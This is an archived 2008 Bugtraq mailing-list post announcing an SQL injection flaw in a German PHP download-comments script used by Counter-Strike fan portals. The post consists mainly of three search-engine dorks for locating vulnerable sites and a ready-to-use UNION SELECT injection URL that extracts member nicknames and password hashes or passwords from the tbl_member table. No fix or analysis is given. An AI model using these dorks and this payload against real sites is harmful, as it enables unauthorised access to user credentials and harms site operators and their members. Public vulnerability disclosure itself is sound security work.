lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 12 Feb 2008 08:16:00 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: Kommentare zum Download script SQL Injection

#########################################################################
#  
#  COUNTER STR&#304;KE PORTALS(Kommentare zum Download)  
#
#########################################################################  
#
# script download=http://www.phpwelt.de/scripte/Sonstiges/?PHPSESSID=3cfc7efaa4b2a50e397b801526944fe6
#  
# AUTHOR : S@BUN  
#
# HOME : http://www.hackturkiye.com/  
#
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#
#########################################################################
#  
# DORK 1 : allinurl: id mode=details "index.php?page=downloads"
#  
# DORK 2 : allinurl: index.php?page=news "mode=comment"
# 
  DORK 3 : "Kommentare zum Download"

#########################################################################
 EXPLOIT :  

index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,member_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/*

#########################################################################
# S@BUN            i AM NOT HACKER        S@BUN  
#########################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ